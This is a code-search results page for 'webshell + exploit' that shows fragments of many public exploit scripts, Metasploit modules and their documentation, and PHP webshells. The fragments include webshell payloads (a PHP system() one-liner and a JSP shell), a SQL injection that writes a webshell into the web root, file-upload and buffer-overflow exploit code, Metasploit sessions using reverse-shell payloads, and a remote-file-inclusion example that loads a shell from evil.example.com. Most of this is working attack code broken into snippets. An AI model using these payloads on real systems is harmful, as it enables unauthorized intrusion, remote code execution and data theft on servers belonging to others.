50+ results for 'webshell + exploit' (147 ms)
1#!/usr/bin/python 2# Lotus CMS Fraise v3.0 LFI - Remote Code Execution Exploit 3# greetz Tecr0C :0) 21# 22# exploit includes: 23# - Proxy support 35# | -------------------------------------------- | 36# | Lotus CMS v3.0 Remote Code Execution Exploit | 37# | by mr_me - net-ninja.net ------------------- | 38# 39# (+) Exploiting target @: 192.168.56.101/webapps/lotus/lcms/ 40# (+) Testing proxy @ localhost:8080.. proxy is found to be working! 42# (+) Writing comment.. comment shell written sucessfully 43# (+) Writing webshell d8e8fca2dc0f896fd7cb4cb0031ba249.php to the webroot.. 44# (+) Entering interactive remote console (q for quit)caidao_php_backdoor_exec.rb https://gitlab.com/alx741/metasploit-framework | Ruby | 72 lines
8 9class Metasploit4 < Msf::Exploit::Remote 10 Rank = ExcellentRanking 11 12 include Msf::Exploit::Remote::HttpClient 13 17 'Description' => %q{ 18 This module takes advantage of the China Chopper Webshell that is 19 commonly used by Chinese hackers. 26 ['URL', 'https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html'], 27 ['URL', 'https://www.exploit-db.com/docs/27654.pdf'], 28 ['URL', 'https://www.us-cert.gov/ncas/alerts/TA15-313A'] 61 if res && res.body =~ /#{flag}/m 62 Exploit::CheckCode::Vulnerable 63 elseREADME.md https://gitlab.com/MisterCh0c1/fuzzdb | Markdown | 92 lines
24**Attack Patterns -** 25Categorized by platform, language, and attack type, malicious and malformed inputs known to cause information leakage and exploitation have been collected into sets of test cases. 26FuzzDB contains comprehensive lists of [attack payloads](https://github.com/fuzzdb-project/fuzzdb/tree/master/attack-payloads) known to cause issues like OS command injection, directory listings, directory traversals, source exposure, file upload bypass, authentication bypass, http header crlf injections, and more. 33**Other useful stuff -** 34Webshells, common password and username lists, and some handy wordlists. 35(https://github.com/fuzzdb-project/fuzzdb/tree/master/web-backdoors) etc etc etc 58 * analysis of error messages 59 * researching old web exploits for repeatable attack strings 60 * scraping scanner payloads from http logs 80 * in training materials and documentation 81 * to learn about software exploitation techniques 82caidao_php_backdoor_exec.rb https://gitlab.com/0072016/metasploit-framework-rapid7 | Ruby | 72 lines
8 9class MetasploitModule < Msf::Exploit::Remote 10 Rank = ExcellentRanking 11 12 include Msf::Exploit::Remote::HttpClient 13 17 'Description' => %q{ 18 This module takes advantage of the China Chopper Webshell that is 19 commonly used by Chinese hackers. 26 ['URL', 'https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html'], 27 ['URL', 'https://www.exploit-db.com/docs/27654.pdf'], 28 ['URL', 'https://www.us-cert.gov/ncas/alerts/TA15-313A'] 61 if res && res.body =~ /#{flag}/m 62 Exploit::CheckCode::Vulnerable 63 elseemelco-1.2.php http://emelco.googlecode.com/svn/trunk/ | PHP | 1457 lines
17 18 EMelCo PHP WebShell v1.2 19 Escrita por >> s E t H << 52 [+] Modificar leerarchivo() para que use shell() con cat 53 [+] Agregar rootexploits 54 [+] Agregar exploits de php 101 102$nombre = 'EMeLCo WebShell v1.2'; 103emelco-1.4.php http://emelco.googlecode.com/svn/trunk/ | PHP | 1800 lines
17 18 EMelCo PHP WebShell v1.4 19 Escrita por >> s E t H << 48 [!] Arreglado un bug en el formulario para hacer chmod 49 [!] Si la version de php no esta afectada por el bug, no se muestra el checkbox para el exploit de ini_restore 50 [+] Funcion para borrarse a si misma 61 [!] Eliminar los mensajes de: "No se puede leer /var/log/messages porque supera los 50000 bytes", o ponerlos como link 62 [+] Agregar rootexploits 63 [+] Agregar exploits de php 106 107$nombre = 'EMeLCo WebShell v1.4'; 108emelco-1.3.php http://emelco.googlecode.com/svn/trunk/ | PHP | 1808 lines
17 18 EMelCo PHP WebShell v1.3 19 Escrita por >> s E t H << 58 [!] Eliminar los mensajes de: "No se puede leer /var/log/messages porque supera los 50000 bytes", o ponerlos como link 59 [+] Agregar rootexploits 60 [+] Agregar exploits de php 101 102$nombre = 'EMeLCo WebShell v1.3'; 10325606.py https://bitbucket.org/DinoRex99/exploit-database.git | Python | 92 lines
1# Exploit Title: Kimai 0.9.2.1306-3 SQLi 2# Date: 05/20/2013 2# Date: 05/20/2013 3# Exploit Author: drone (@dronesec) 4# Vendor Homepage: http://www.kimai.org/ 24 25def webshell(options, id): 26 """ dat webshell 55 if options.shell: 56 return webshell(options, id) 5734431.html https://bitbucket.org/DinoRex99/exploit-database.git | HTML | 142 lines
4 5Successful exploit requires that the 'nagiosadmin' be logged into the web interface. 6 6 7Attackers can exploit these issues to gain unauthorized access to the affected application and perform certain administrative actions. 8 54 55Modify nagios command to create a webshell when run 5624359.php https://bitbucket.org/DinoRex99/exploit-database.git | PHP | 119 lines
6 7Successful exploitation of this issue may allow an attacker to execute malicious script code on a vulnerable server. 8 23 YaPiG (http://yapig.sourceforge.net/) is a PHP Image Gallery script. 24 This Proof of Concept creates a small webshell script in the server 25 that we can use to exec commands in the server. 27 Then creates a crafted comment saved in a new .php file. This comment 28 contains an encoded webshell. Once this .php file is opened, the code 29 contained creates acidwebshell.php. 65 66/* This is my webshell script generator. It contains the webshell encoded 67 to avoid magic_quotes and urldecode altering the content of the script. */ 83 84echo "[+] Creating WebShell Script ... "; 8520342.php https://bitbucket.org/DinoRex99/exploit-database.git | PHP | 248 lines
2/* 3# Exploit Title: WespaJuris <= 3.0 auto exploit 4# Date: 07th august 2012 12 13Use this exploit to upload a webshell on vulnerable applications. 14Usage: 44 [!] Exploit complete. 45 [i] You have now a webshell in <http://localhost/juris/clientdir/30/dl/webshell.php> 46 46 47Then, go to http://localhost/juris/clientdir/30/dl/webshell.php and see your webshell. 48 48 49:: How this exploit works? Manually work. 508765.php https://bitbucket.org/DinoRex99/exploit-database.git | PHP | 97 lines
3print_r(' 4******** IIS 6 WEBDAV Exploit.By racle@tian6.com && Securiteweb.org ******** 5 91 sent($sock); 92 echo "Be cool,man! Webshell is http://".$host.$path."racle.asp"; 93 die;}nagios_xi_autodiscovery_webshell.md https://github.com/rapid7/metasploit-framework.git | Markdown | 226 lines
143[*] Auxiliary module execution completed 144msf6 auxiliary(scanner/http/nagios_xi_scanner) > use exploit/linux/http/nagios_xi_autodiscovery_webshell 145[*] Using configured payload linux/x86/meterpreter/reverse_tcp 145[*] Using configured payload linux/x86/meterpreter/reverse_tcp 146msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set target 0 147target => 0 197PASSWORD => labpass1 198msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set DELETE_WEBSHELL false 199DELETE_WEBSHELL => false 199DELETE_WEBSHELL => false 200msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set WEBSHELL_NAME lobster.php 201WEBSHELL_NAME => lobster.php 201WEBSHELL_NAME => lobster.php 202msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > run 20318266.py https://bitbucket.org/DinoRex99/exploit-database.git | Python | 282 lines
32# 33# Exploit requirement: 34# -------------------- 42# +==============================================================================================+ 43# | Open Conference/Journal/Harvester Systems <= 2.3.X csrf/upload/remote code execution exploit | 44# | Found by: mr_me | 53# 54# (+) Exploit sent to the client target 127.0.0.1 attacking 192.168.220.134. 55# (-) Code injection and execution failed! 59# 60# (+) Exploit sent to the client target 127.0.0.1 attacking 192.168.220.134. 61# (!) Code injection worked! 61# (!) Code injection worked! 62# (!) Launching webshell..! 63#pfsense_diag_routes_webshell.md https://github.com/rapid7/metasploit-framework.git | Markdown | 162 lines
28* Follow the installation instructions above 29* Do: `use exploit/unix/http/pfsense_diag_routes_webshell` 30* Do: `set username <name>` 78[*] Using configured payload bsd/x64/shell_reverse_tcp 79msf6 exploit(unix/http/pfsense_diag_routes_webshell) > set USERNAME diag_only 80USERNAME => diag_only 124USERNAME => diag_only 125msf6 exploit(unix/http/pfsense_diag_routes_webshell) > set PASSWORD labpass1 126PASSWORD => labpass1 128RHOST => 10.0.0.10 129msf6 exploit(unix/http/pfsense_diag_routes_webshell) > check 130 132[+] 10.0.0.10:80 - The target is vulnerable. 133msf6 exploit(unix/http/pfsense_diag_routes_webshell) > set LHOST 10.0.0.2 134LHOST => 10.0.0.216980.py https://bitbucket.org/DinoRex99/exploit-database.git | Python | 153 lines
2# ~INFORMATION 3# Exploit Title: If-CMS 2.07 Pre-Auth Local File Inclusion 0day Exploit 4# Author: TecR0c 48|----------------------------------------| 49|Exploit: If-CMS 2.07 LFI RCE 50|Author: %s 99 100def postRequestWebShell(encodedCommand): 101 webSiteUrl = url.geturl()+'.shell.php' 134 encodedCommand = base64.b64encode(command) 135 response = postRequestWebShell(encodedCommand) 136 print response 138 encodedCommand = base64.b64encode('rm .shell.php') 139 postRequestWebShell(encodedCommand) 140 print "\n[!] Removed .shell.php\n"nagios_xi_magpie_debug.rb https://github.com/rapid7/metasploit-framework.git | Ruby | 246 lines
5 6class MetasploitModule < Msf::Exploit::Remote 7 Rank = ExcellentRanking 8 9 include Msf::Exploit::EXE 10 include Msf::Exploit::FileDropper 10 include Msf::Exploit::FileDropper 11 include Msf::Exploit::Remote::HttpClient 12 include Msf::Exploit::Remote::HttpServer::HTML 12 include Msf::Exploit::Remote::HttpServer::HTML 13 prepend Msf::Exploit::Remote::AutoCheck 14 20 'Description' => %q{ 21 This module exploits two vulnerabilities in Nagios XI <= 5.5.6: 22 CVE-2018-15708 which allows for unauthenticated remote code executionmake_deb.sh https://bitbucket.org/jarrettchisholm/oscar.git | Shell | 484 lines
61# v 24 - Updated reOscar to reOscar2.sh, added ichppccode table, missig HRMDocuments column and many indices to patch.sql 62# v 25 - More indices added to patch.sql and web.xml added to OscarDocuments and moved OscarDocuments to prevent webshell exploit 63# v 26 - Updated Rich Text Letter and moved OscarDocuments to prevent webshell exploit39982.rb https://bitbucket.org/DinoRex99/exploit-database.git | Ruby | 69 lines
1# Exploit Title: Airia - Webshell Upload Vulnerability 2# Date: 2016-06-20 2# Date: 2016-06-20 3# Exploit Author: HaHwul 4# Exploit Author Blog: www.hahwul.com 13if ARGV.length !=2 14puts "Airia Webshell Upload Exploit(Vulnerability)" 15puts "Usage: #>ruby airia_ws_exploit.rb [targetURL] [phpCode]" 18puts " Example : ~~.rb http://127.0.0.1/vul_test/airia 'echo zzzz'" 19puts " exploit & code by hahwul[www.hahwul.com]" 20 35request["Content-Type"] = "application/x-www-form-urlencoded" 36request.set_form_data({"mode"=>"save",""=>"","file"=>"shell.php","scrollvalue"=>"","contents"=>"<?php echo 'Airia Webshell Exploit';#{shell};?>","group"=>"vvv_html"}) 37response = http.request(request) 49 50output: Airia Webshell Exploit123 5119007.php https://bitbucket.org/DinoRex99/exploit-database.git | PHP | 126 lines
1<?php 2# Exploit Title: PHPNet <= 1.8 (ler.php) SQL Injection 3# Exploit Author: WhiteCollarGroup 15 ~> SQL Injection 16This exploit is for a vulnerability in ler.php, but are the same vulnerability on imprimir.php and imagem.php. 17ler.php?id=[SQLi] 32 After open administration panel, try to add a new article. 33 Use the upload form to upload your webshell. 34 After posting, access: 62 63echo "PHPNet <= 1.8 SQLi Exploit\n"; 64echo "Discovered by WhiteCollarGroup\n"; 118 if($i==0) { 119 echo "[-] Exploit failed. Make sure that's server is using a valid version of PHPNet without mod_security. We're sorry."; 120 } else {36202.py https://bitbucket.org/DinoRex99/exploit-database.git | Python | 330 lines
5# Seagate Business NAS pre-authentication remote code execution 6# exploit as root user. 7# 17# - -c : (optional) create a cookie which will give admin access. 18# Not specifying this flag results in webshell installation. 19# - ua : (optional) the user agent used by the browser for the 60hostname = '' 61webshell = str(uuid.uuid1()) + ".php" 62 195 196 url = 'http://{0}:{1}/{2}'.format(host, port, webshell) 197 req = urllib2.Request(url, headers = headers, data = post_data) 226 print "" 227 print "Seagape v1.0 -- Interactive Seagate NAS Webshell" 228 print " - OJ Reeves (@TheColonial) - https://beyondbinary.io/"caidao_php_backdoor_exec.rb https://github.com/rapid7/metasploit-framework.git | Ruby | 69 lines
5 6class MetasploitModule < Msf::Exploit::Remote 7 Rank = ExcellentRanking 8 9 include Msf::Exploit::Remote::HttpClient 10 14 'Description' => %q{ 15 This module takes advantage of the China Chopper Webshell that is 16 commonly used by Chinese hackers. 23 ['URL', 'https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html'], 24 ['URL', 'https://www.exploit-db.com/docs/27654.pdf'], 25 ['URL', 'https://www.cisa.gov/uscert/ncas/alerts/TA15-313A'] 58 if res && res.body =~ /#{flag}/m 59 Exploit::CheckCode::Vulnerable 60 else17003.py https://bitbucket.org/DinoRex99/exploit-database.git | Python | 202 lines
2# ~INFORMATION 3# Exploit Title: iCMS v1.1 Admin SQLi/bruteforce Exploit 4# Author: TecR0c 45sitePath = '/var/www/iCMS/icms/' 46webshell = '<?php+system(base64_decode($_REQUEST[cmd]));?>' 47 65|----------------------------------------| 66|Exploit: iCMS SQLi RCE 67|Author: %s 151 "admin/item_detail.php?id=1+UNION+SELECT+NULL,'TECR0CSHELL"\ 152 +webshell+"LLEHSC0RCET'+INTO+OUTFILE+'"+sitePath+".webshell.php'" 153 opener.open(webSiteUrl) 153 opener.open(webSiteUrl) 154 print '[+] Wrote WEBSHELL !' 155 else:44825.html https://bitbucket.org/DinoRex99/exploit-database.git | HTML | 33 lines
1# Exploit Title: GreenCMS v2.3.0603 CSRF vulnerability get webshell 2# Date: 2018-06-02 2# Date: 2018-06-02 3# Exploit Author: xichao 4# Vendor Homepage: https://github.com/GreenCMS/GreenCMS 24 <input type="hidden" name="content" value="<?php phpinfo();?>"> 25 <button type="submit" value="Submit">WebShell</button> 26 </form>22128.c https://bitbucket.org/DinoRex99/exploit-database.git | C | 239 lines
2 3A vulnerability has been discovered in H-Sphere Webshell. During the pre-authentication phase Webshell fails to perform sufficient bounds checking on user-supplied HTTP parameters. As a result, a malicious attacker may be able to trigger a buffer overrun. 4 9/* 10 * Local r00t exploit for Webshell 2.4 (possibly other versions). 11 * Vulnerability found and exploit written by Carl Livitt 49#define SHELLSCRIPT_FILE "/tmp/zz" 50#define EXPLOIT_FILE "/tmp/.webshell.txt" 51#define ROOT_SHELL "/tmp/rs" 130 if((pid=fork())==0) { 131 system(WEBSHELL_PROGRAM" < "EXPLOIT_FILE" &>/dev/null"); 132 exit(0); 167 if((fp=fopen(EXPLOIT_FILE,"w"))==NULL) { 168 printf("Could not create exploit file %s\n", EXPLOIT_FILE); 169 exit(1);22454.c https://bitbucket.org/DinoRex99/exploit-database.git | C | 339 lines
174 } 175 send(websock, exploit_buf, strlen(exploit_buf), 0); 176 //len=recv(websock, buf, sizeof(buf)-1, 0); 264 sprintf(exploit_buf,"GET %s HTTP/1.1\n",location); 265 sprintf(exploit_buf,"%sHost: %s\n",exploit_buf,target); 266 sprintf(exploit_buf,"%sAccept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1\n", exploit_buf); 266 sprintf(exploit_buf,"%sAccept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1\n", exploit_buf); 267 sprintf(exploit_buf,"%sAccept-Language: en-gb, en;q=0.66, en-us;q=0.33\n", exploit_buf); 268 sprintf(exploit_buf,"%sAccept-Encoding: gzip, deflate, compress;q=0.9\n", exploit_buf); 268 sprintf(exploit_buf,"%sAccept-Encoding: gzip, deflate, compress;q=0.9\n", exploit_buf); 269 sprintf(exploit_buf,"%sAccept-Charset: ISO-8859-1, utf-8;q=0.66, *;q=0.66\n", exploit_buf); 270 sprintf(exploit_buf,"%sCookie: ck_ams=00000; ck_amsv=11043763620; ck_sid=3J4EUD0l4Juf1ev-06103517452.aa\n", exploit_buf); 270 sprintf(exploit_buf,"%sCookie: ck_ams=00000; ck_amsv=11043763620; ck_sid=3J4EUD0l4Juf1ev-06103517452.aa\n", exploit_buf); 271 sprintf(exploit_buf,"%sAccept-Encoding: %s\n\n",exploit_buf, sc); 272 //printf("%s\n\n", exploit_buf);dlink_central_wifimanager_sqli.md https://github.com/rapid7/metasploit-framework.git | Markdown | 180 lines
2 3This module exploits a vulnerability in Dlink Central 4WifiManager (CWM-100), found in versions lower than 31- set action ... 32- `check` or `exploit` 33- should work as in the scenarios below 179(copy ... to ...), but using full paths, the attacker must know the path of the webroot 180to upload a webshell this way. 18119060.php https://bitbucket.org/DinoRex99/exploit-database.git | PHP | 132 lines
1<?php 2# Exploit Title: TheBlog <= 2.0 SQL Injection 3# Exploit author: WhiteCollarGroup 43 After get admin access, on the menu, click "Upload". 44 Upload your webshell on the form. A link will be appears on file list ("Lista de Arquivos"). 45 45 46 > What's this exploit? 47 Are a PoC for SQL Injection on "index.php?id=". 48 How to use: 49 php exploit.php <target> 50 Example: 50 Example: 51 php exploit.php http://target.com/blog/ 52lrfi.html https://bitbucket.org/rmusser/infosec-reference.git | HTML | 186 lines
107 <br /> 108 /vulnerable.php?COLOR=http://evil.example.com/webshell.txt? 109 <br /> 112 <br /> 113 /vulnerable.php?COLOR=C:\\ftp\\upload\\exploit 114 <br /> 114 <br /> 115 Executes code from an already uploaded file called exploit.php (local 116 file inclusion vulnerability) 141 <li> 142 <a href="http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/"> 143 Exploiting PHP File Inclusion – Overview « Reiners’ Weblogzimbra_xxe_rce.md https://github.com/rapid7/metasploit-framework.git | Markdown | 48 lines
2 3This module exploits an XML external entity vulnerability and a server side request forgery to get unauthenticated code execution on Zimbra Collaboration Suite. The XML external entity vulnerability in the Autodiscover Servlet is used to read a Zimbra configuration file that contains an LDAP password for the 'zimbra' account. The zimbra credentials are then used to get a user authentication cookie with an AuthRequest message. Using the user cookie, a server side request forgery in the Proxy Servlet is used to proxy an AuthRequest with the 'zimbra' credentials to the admin port to retrieve an admin cookie. After gaining an admin cookie the ClientUploader is used to upload a JSP webshell that can be triggered from the web server to get command execution on the host. The issues reportedly affect Zimbra Collaboration Suite v8.5 to v8.7.11. This module was tested with Zimbra Release 8.7.1.GA.1670.UBUNTU16.64 UBUNTU16_64 FOSS edition. 4 151. `./msfconsole -q` 162. `use exploit/linux/http/zimbra_xxe_rce` 173. `set rhosts <rhost>` 184. `set lhost <lhost>` 195. `exploit` 20 25``` 26msf5 exploit(linux/http/zimbra_xxe_rce) > exploit 27shopware_createinstancefromnamedarguments_rce.rb https://github.com/rapid7/metasploit-framework.git | Ruby | 283 lines
5 6class MetasploitModule < Msf::Exploit::Remote 7 Rank = ExcellentRanking 8 9 include Msf::Exploit::Remote::HttpClient 10 include Msf::Exploit::FileDropper 15 'Description' => %q( 16 This module exploits a php object instantiation vulnerability that can lead to RCE in 17 Shopware. An authenticated backend user could exploit the vulnerability. 21 22 An attacker can leverage this to deserialize an arbitrary payload and write a webshell to 23 the target system, resulting in remote code execution. 36 ['CVE', '2017-18357'], # not really because we bypassed this patch 37 ['URL', 'https://blog.ripstech.com/2017/shopware-php-object-instantiation-to-blind-xxe/'] # initial writeup w/ limited exploitation 38 ],pfsense_diag_routes_webshell.rb https://github.com/rapid7/metasploit-framework.git | Ruby | 227 lines
84 OptString.new('WEBSHELL_NAME', [false, 'The name of the uploaded webshell. This value is random if left unset', nil]), 85 OptBool.new('DELETE_WEBSHELL', [true, 'Indicates if the webshell should be deleted or not.', true]) 86 ] 151 def drop_webshell 152 webshell_location = normalize_uri(target_uri.path, "#{@webshell_uri}#{@webshell_name}") 153 print_status("Uploading webshell to #{webshell_location}") 181 if datastore['DELETE_WEBSHELL'] 182 register_file_for_cleanup("#{@webshell_path}#{@webshell_name}") 183 end 197 'method' => 'GET', 198 'uri' => normalize_uri(target_uri.path, "#{@webshell_uri}#{@webshell_name}"), 199 'vars_get' => { 214 # create a randomish web shell name if the user doesn't specify one 215 @webshell_name = datastore['WEBSHELL_NAME'] || "#{Rex::Text.rand_text_alpha(5..12)}.php" 21622129.c https://bitbucket.org/DinoRex99/exploit-database.git | C | 325 lines
11/* 12 * Remote r00t exploit for Webshell 2.4 (possibly other versions). 13 * Vulnerability found and exploit written by Carl Livitt 30gcc -o webshell-remote webshell-remote.c 31./webshell-remote -t www.host-to-exploit.com -l /path/to/webshell 32 101"-P port Port to bind shell on remote host [10000]\n" 102"-l location Location of webshell (eg. /cgi-bin/webshell)\n\n" 103"Example:\n\n" 287 sprintf(exploit_buf,"%sAccept-Encoding: %s\n",exploit_buf, sc); 288 sprintf(exploit_buf,"%s%s\n",exploit_buf,egg); 289 sprintf(exploit_buf,"%sContent-Length: %d\n\n",exploit_buf,EGG_SIZE*2); 290 sprintf(exploit_buf,"%s--%s\n",exploit_buf, egg+CONTENT_LENGTH); 291 sprintf(exploit_buf,"%sContent-Disposition: form-data; name=\"TESTNAME\"; filename=\"TESTFILENAME\"\r\n\r\n",exploit_buf); 292 sprintf(exploit_buf,"%s%-*s\n",exploit_buf, EGG_SIZE*4," ");9556.php https://bitbucket.org/DinoRex99/exploit-database.git | PHP | 37 lines
3+---------------------------------------------------------------------------+ 4osCommerce Online Merchant 2.2 RC2a RCE Exploit 5by Flyh4t 9Gr44tz to q1ur3n ã€puret_tã€ukã€toby57 and all the other members of WST 10Thx to exploits of blackh 11+---------------------------------------------------------------------------+ 33fputs($fd,$message); 34echo ("[+]Go to see U webshell : $host/fly.php"); 35?>nagios_xi_autodiscovery_webshell.rb https://github.com/rapid7/metasploit-framework.git | Ruby | 238 lines
89 OptInt.new('DEPTH', [true, 'The depth of the path traversal', 10]), 90 OptString.new('WEBSHELL_NAME', [false, 'The name of the uploaded webshell. This value is random if left unset', nil]), 91 OptBool.new('DELETE_WEBSHELL', [true, 'Indicates if the webshell should be deleted or not.', true]) 148 # drop a basic web shell on the server 149 webshell_location = normalize_uri(target_uri.path, "#{@webshell_uri}#{@webshell_name}") 150 print_status("Uploading webshell to #{webshell_location}") 181 if datastore['DELETE_WEBSHELL'] 182 register_file_for_cleanup("#{@webshell_path}#{@webshell_name}") 183 end 196 'mode' => 'deletejob', 197 'job' => "#{'../' * datastore['DEPTH']}#{@webshell_path}#{@webshell_name}" 198 } 223 # create a randomish web shell name if the user doesn't specify one 224 @webshell_name = datastore['WEBSHELL_NAME'] || "#{Rex::Text.rand_text_alpha(5..12)}.php" 225rce_check.rb https://github.com/rapid7/metasploit-framework.git | Ruby | 93 lines
20 if version < Rex::Version.new(fixed_version) 21 matching_exploits = add_cve_module_to_hash(matching_exploits, info) 22 end 30 if version == Rex::Version.new(fixed_version) 31 matching_exploits = add_cve_module_to_hash(matching_exploits, info) 32 end 66 if version >= lower && version <= higher 67 matching_exploits = add_cve_module_to_hash(matching_exploits, info) 68 end 76 # 77 # @param matching_exploits [Hash] maps CVE numbers to exploit module names 78 # @param cve_module_array [Array] contains arrays with a CVE number at index 0 and a matching exploit at index 1 78 # @param cve_module_array [Array] contains arrays with a CVE number at index 0 and a matching exploit at index 1 79 # @return [Hash] updated list of matching exploits, mapping CVE numbers to exploit module names 80 def add_cve_module_to_hash(matching_exploits, cve_module_array)17510.py https://bitbucket.org/DinoRex99/exploit-database.git | Python | 91 lines
2# coding=utf-8 3# pma3 - phpMyAdmin3 remote code execute exploit 4# Author: wofeiwo<wofeiwo@80sec.com> 19 print "PMA3 (Version below 3.3.10.2 and 3.4.3.1) remote code 20execute exploit" 21 print "Usage: %s <PMA_url>" % program 63 # ����setup��ȡshell 64 print "[+] Trying get webshell.." 65 postdata = 85 else: 86 print "[-] Cannot get webshell." 8739691.py https://bitbucket.org/DinoRex99/exploit-database.git | Python | 105 lines
1# Exploit Title: Oracle Application Testing Suite Authentication Bypass and Arbitrary File Upload Remote Exploit 2# Exploit Author: Zhou Yu <504137480@qq.com > 19 20webshell_content=''' 21<%@ page import="java.util.*,java.io.*" %> 42post_data = post_data + "Content-Disposition: form-data; name=\"fileName1\"\r\n" 43post_data = post_data + "\r\nwebshell.jsp\r\n" 44post_data = post_data + "--" + boundary + "\r\n" 56post_data = post_data + "--" + boundary + "\r\n" 57post_data = post_data + "Content-Disposition: form-data; name=\"file1\"; filename=\"webshell.jsp\"\r\n" 58post_data = post_data + "Content-Type: text/plain\r\n" 58post_data = post_data + "Content-Type: text/plain\r\n" 59post_data = post_data + "\r\n" + webshell_content +"\r\n" 60post_data = post_data + "--" + boundary + "\r\n" 75 print "[+]upload done!" 76 webshellurl = "http://" + ip + ":" + str(port) + "/olt/pages/webshell.jsp" 77 print "[+]wait a moment,detecting whether the webshell exists..."exchange_proxyshell_rce.md https://github.com/rapid7/metasploit-framework.git | Markdown | 142 lines
25 1. If no email address is specified 26 1. The exploit will leverage the SSRF to issue a reques to EWS and enumerate the email addresses 27 * This technique was taken from [dmassland/proxyshell-poc](https://github.com/dmaasland/proxyshell-poc/blob/main/proxyshell-enumerate.py) 31 * Email addresses are mapped to SIDs using a request to autodiscover and MAPI 321. A draft email is saved to the identified user's mailbox containing an encoded webshell embedded within an attachment 331. The `New-MailboxExportRequest` cmdlet is used to export the attachment and write the webshell to an accessible location 331. The `New-MailboxExportRequest` cmdlet is used to export the attachment and write the webshell to an accessible location 341. The exploit waits for the webshell to be written and uses it to execute OS commands 351. The webshell*, export request and draft email are all removed 94``` 95msf6 > use exploit/windows/http/exchange_proxyshell_rce 96[*] Using configured payload windows/x64/meterpreter/reverse_tcp 104[+] 192.168.159.42:443 - The target is vulnerable. 105msf6 exploit(windows/http/exchange_proxyshell_rce) > exploit 106zimbra_xxe_rce.rb https://github.com/rapid7/metasploit-framework.git | Ruby | 258 lines
5 6class MetasploitModule < Msf::Exploit::Remote 7 Rank = ExcellentRanking 8 9 include Msf::Exploit::Remote::HttpClient 10 include Msf::Exploit::Remote::HttpServer 10 include Msf::Exploit::Remote::HttpServer 11 include Msf::Exploit::FileDropper 12 16 'Description' => %q{ 17 This module exploits an XML external entity vulnerability and a 18 server side request forgery to get unauthenticated code execution 26 cookie. After gaining an admin cookie the Client Upload servlet is 27 used to upload a JSP webshell that can be triggered from the web 28 server to get command execution on the host. The issues reportedlyvmware_vcenter_uploadova_rce.md https://github.com/rapid7/metasploit-framework.git | Markdown | 179 lines
10Note that later vulnerable versions of the Linux appliance aren't 11exploitable via the webshell technique. Furthermore, writing an SSH 12public key to `/home/vsphere-ui/.ssh/authorized_keys` works, but the 47patched. Later vulnerable versions of the Linux appliance aren't 48exploitable via the webshell technique. I haven't been able to download 49and test them all. Sorry. 90``` 91msf6 > use exploit/multi/http/vmware_vcenter_uploadova_rce 92[*] Using configured payload java/jsp_shell_reverse_tcp 92[*] Using configured payload java/jsp_shell_reverse_tcp 93msf6 exploit(multi/http/vmware_vcenter_uploadova_rce) > options 94 115 116Exploit target: 117vmware_vcenter_uploadova_rce.rb https://github.com/rapid7/metasploit-framework.git | Ruby | 236 lines
5 6class MetasploitModule < Msf::Exploit::Remote 7 10 11 prepend Msf::Exploit::Remote::AutoCheck 12 include Msf::Exploit::Remote::CheckModule 12 include Msf::Exploit::Remote::CheckModule 13 include Msf::Exploit::Remote::HttpClient 14 include Msf::Exploit::FileDropper 21 'Description' => %q{ 22 This module exploits an unauthenticated OVA file upload and path 23 traversal in VMware vCenter Server to write a JSP payload to a 27 Note that later vulnerable versions of the Linux appliance aren't 28 exploitable via the webshell technique. Furthermore, writing an SSH 29 public key to /home/vsphere-ui/.ssh/authorized_keys works, but thecaidao_php_backdoor_exec.md https://bitbucket.org/DinoRex99/metasploit-framework.git | Markdown | 44 lines
1China Chopper Caidao PHP Backdoor or simply [Chinese Caidao](https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html) is a webshell manager coded in PHP. 2 10 2. Start msfconsole 11 3. Do: `use exploit/multi/http/caidao_php_backdoor_exec` 12 4. Do: `set rport port` 17``` 18 8. Do: `exploit` 19 9. You should get a shell. 33``` 34msf exploit(caidao_php_backdoor_exec) > exploit 35shell_handler.py https://github.com/andresriancho/w3af.git | Python | 171 lines
36 37def get_webshells(extension, force_extension=False): 38 """ 38 """ 39 This method returns a webshell content to be used in exploits, based on 40 the extension, or based on the x-powered-by header. 45 """ 46 return _get_file_list('webshell', extension, force_extension) 47 54 """ 55 Similar to get_webshells but returns a code that when it is evaluated runs 56 `command` in the operating system. 58 Example: 59 get_webshells() returns: 60 "<? system( $_GET['cmd'] ) ?>"dav.py https://github.com/andresriancho/w3af.git | Python | 191 lines
57 58 Then the exploit plugin that exploits os_commanding 59 ( attack.os_commanding ) should return 'os_commanding' in this method. 114 om.out.debug(msg) 115 self._exploit_url = exploit_url 116 return True 127 :return: This method returns the probability of getting a root shell 128 using this attack plugin. This is used by the "exploit *" 129 function to order the plugins and first try to exploit the 129 function to order the plugins and first try to exploit the 130 more critical ones. This method should return 0 for an exploit 131 that will never return a root shell, and 1 for an exploit that 153 154 self.exploit_url = exploit_url 155nagios_xi_magpie_debug.md https://github.com/rapid7/metasploit-framework.git | Markdown | 100 lines
2 3This module exploits two vulnerabilities in Nagios XI <= 5.5.6: 4CVE-2018-15708 which allows for unauthenticated remote code execution 8 9The exploit works as follows: 10 14 - The `RSRVHOST` and `RSRVPORT` options are used to specify the HTTPS server host and port. 15- A PHP webshell and payload executable are uploaded via `magpie_debug.php`. 16- A command is executed via the webshell. This command elevates privileges and runs the payload executable. 321. `msfconsole` 331. `use exploit/linux/http/nagios_xi_magpie_debug` 341. `set RHOSTS [IP]` 351. `set RSRVHOST [IP]` 361. `exploit` 371. You should get a new session with *root* privilegesfile_upload.py https://github.com/andresriancho/w3af.git | Python | 224 lines
